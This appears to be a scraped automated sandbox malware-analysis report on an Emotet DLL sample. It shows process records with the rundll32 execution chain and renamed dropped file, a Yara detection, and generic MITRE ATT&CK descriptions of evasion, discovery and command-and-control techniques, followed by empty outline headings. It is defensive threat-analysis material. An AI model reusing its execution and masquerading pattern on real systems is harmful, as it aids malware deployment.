Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\yFAXc9z51V.dll",Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 6428 Parent PID: 572

General

Start time:	00:59:01
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 4332 Parent PID: 572

General

Start time:	00:59:06
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 6768 Parent PID: 6976

General

Start time:	00:59:12
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Wlimfwutowthen\gdntcqg.ebr",Control_RunDLL
Imagebase:	0x1f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.808384988.00000000026E7000.00000004.00000020.sdmp, Author: Joe Security

Analysis Process: svchost.exe PID: 1060 Parent PID: 572

General

Start time:	00:59:43
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 5980 Parent PID: 572

General

Start time:	01:00:00
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: MpCmdRun.exe PID: 5496 Parent PID: 6428

General

Start time:	01:00:02
Start date:	19/11/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff6eaa50000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 3928 Parent PID: 5496

General

Start time:	01:00:03
Start date:	19/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 4424 Parent PID: 572

General

Start time:	01:00:15
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report yFAXc9z51V

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre